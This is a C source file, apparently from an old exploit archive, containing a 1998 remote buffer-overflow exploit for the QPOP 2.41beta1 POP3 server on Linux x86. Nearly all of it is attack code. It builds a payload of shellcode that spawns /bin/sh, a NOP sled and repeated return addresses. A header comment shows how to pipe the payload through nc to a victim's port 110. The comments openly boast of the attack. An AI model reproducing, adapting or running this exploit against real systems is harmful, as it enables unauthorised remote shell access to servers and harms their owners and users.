home *** CD-ROM | disk | FTP | other *** search
- /*
- * QPOP 2.41beta1 exploit (linux x86) by mastoras
- * Some code ripped from "mount" exploit by Bloodmask and Vio
- * Assembly code changed so it is not affected by tolower() function.
- *
- * this one sucks (too), but works :>
- * (./qpop 997 4000; cat) | nc your_victim 110
- *
- * 28 Jun 1998
- * mastoras@hack.gr http://www.hack.gr/users/mastoras
- * Mastoras Wins! Fatality!
- */
-
- #include <unistd.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
-
- #define DEFAULT_OFFSET 4000
-
- u_long get_esp()
- {
- __asm__("movl %esp, %eax");
- }
-
- int main(int argc, char **argv)
- {
- u_char execshell[] =
- "\xeb\x26\x5e\x8d\x1e\x89\x5e\x1b\x31\xed\x89\x6e\x17\x89\x6e\x1f"
- "\xb8\x1b\x76\x34\x12\x35\x10\x76\x34\x12\x8d\x6e\x1b\x89\xe9\x89"
- "\xea\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd5\xff\xff\xff"
- "/////////////////bin/sh";
-
- unsigned long *addr_ptr = NULL;
- unsigned int ret_address;
- char *buff = NULL;
- char *ptr = NULL;
- int BUFFER_SIZE = 997;
- int ofs = DEFAULT_OFFSET;
- int nops = (300/4);
- int i;
-
- if (argc>1) BUFFER_SIZE = atoi(argv[1]);
- if (argc>2) ofs = atoi(argv[2]);
-
- buff = malloc(4096);
- if(!buff)
- {
- printf("can't allocate memory\n");
- exit(0);
- }
- ptr = buff;
-
- /* fill start of buffer with nops */
-
- memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
- ptr += BUFFER_SIZE-strlen(execshell);
-
- /* stick asm code into the buffer */
-
- for(i=0;i < strlen(execshell);i++)
- *(ptr++) = execshell[i];
-
- addr_ptr = (long *)ptr;
-
- ret_address = get_esp() - ofs;
-
- for(i=0;i < (nops);i++)
- *(addr_ptr++) = ret_address;
-
- ptr = (char *)addr_ptr;
- *ptr = 0;
-
- fprintf(stderr, "length %d+%d+%d=%d, address=%x\n", BUFFER_SIZE,strlen(execshell),nops,
- BUFFER_SIZE+strlen(execshell)+nops, ret_address);
-
- printf("%s\n",buff);
- return 0;
- }
- /* www.hack.co.za [2000]*/